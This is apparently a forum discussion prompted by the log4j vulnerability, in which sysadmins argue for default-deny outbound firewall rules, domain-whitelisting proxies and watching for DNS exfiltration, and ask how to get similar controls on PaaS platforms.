We just spend the better part of the day going through applications and figuring out if they use log4j, if so which version, fixed code, notifying customers. Then we remembered that the majority of our servers can't actually reach the internet. They only accept requests, they cannot make outbound requests to the internet.
I know it a little old fashion, as explained to me by a customer earlier this year. In the age of cloud, people expect their servers to have a direct internet connection.
It's annoying to work with, but ideally your devices should only be able to reach the internet via a proxy and/or only whitelisted hosts. Understandably there are cases where this just isn't an option, but really do consider if your server truly needs to communicate with the internet at large. Can you use an HTTPS proxy, and just whitelists the required domains? The answer is most often "Yes", it's just a little more work.
Is there any chance that when asked to contact a service, your locked down machines first issue a DNS lookup to determine where to try to connect to, before the connection attempt gets blocked by your aggressive whitelisting?
If so, there might still be a DNS exfiltration vulnerability even on your tightly controlled setup.
I would love it if PAASs such as Heroku and Fly.io had configurable outbound firewalls. Especially when building with un-curated package managers such as NPM and PyPi, it’s virtually impossible to audit all dependencies.
Exploits like this and the now regular news of packages being replaced with backdoored versions makes me very nervous. Being able to whitelist what outbound connections were aloud would help enormously, even though it would not solve all potential exploits.
Is there a recommended way to do this with a Docker app?
Edit: Should note already use inbound waf like CloudFlare. What I want is something like Little Snitch but for a PAAS deployed app.
For PAAS this won’t work, but for on-prem stuff you can just log firewall denies on outbound traffic that will quickly let you know if somethings wrong.
You could have test environment where your container run for a few days, before pushing into production on a PAAS. Just run the container on a VM with IPTables and logging. It won’t find everything, some call might only be called on very specific circumstance, but it could find low hanging fruits.
Preach it. I have been the bane of third-party software vendors for years because I require a default-deny outbound policy for servers (and erring on the side of default-deny between subnets, generally).
This log4j vulnerability will serve, for me, as yet one more example as to why that's a good idea.
I think the bane is when you make it hard to get exceptions. If a developer can add a specific IP, or ideally a domain, to the "allow" group, automatically, that's far less impact than if you have to fill in pages of paper explaining why you need outbound access. In the latter case, developers will work around your restrictions, and you're simply left with a false sense of security.
Arguably you shouldn't make too hard to get exceptions, but what we frequently see is that the developer actually don't appear to know that their code is make outbound connects, and they certain don't mention it as part of the requirements.
We've frequently build setups where machines are completely isolated, because the requirements do not mention that this software will connect to servers on the internet. When we install the software it then fails to work, because it was never testet in a closed environment. I've seen Java applications fail to boot because they cannot can't pull a XSD from the internet... Why isn't that just bundled? Why do you need to get that a boot time? What is that other server is down?
But you're right, valid firewall opening should not be hard get.
So many vendors (I work with a lot of COTS software-- not in-house-developed) have absolutely no idea what their communication dependencies are (client-to-server, server-to-server, etc). I've ended up being the first sysadmin to ask more times than I'd like to count.
I, like the grandparent poster suggested, prefer to put applications where the developer demands carte blanche access to the Internet via TCP port 443 behind a MiTM proxy and whitelist domains. (I don't do as much to stop DNS-based exfiltration as I should be doing, though. It's probably a good time to revisit that using this vulnerability as a practical justification.)
> I know it a little old fashion, as explained to me by a customer earlier this year.
It is only outdated by proponents of cloud services since IP based filters are difficult to implement and/or require high maintenance.
Otherwise sensible network segmentation and access rules are pretty much one of the best security mechanisms you can implement, far beyond the usual theatre some security products want to sell.
I know it a little old fashion, as explained to me by a customer earlier this year. In the age of cloud, people expect their servers to have a direct internet connection.
It's annoying to work with, but ideally your devices should only be able to reach the internet via a proxy and/or only whitelisted hosts. Understandably there are cases where this just isn't an option, but really do consider if your server truly needs to communicate with the internet at large. Can you use an HTTPS proxy, and just whitelists the required domains? The answer is most often "Yes", it's just a little more work.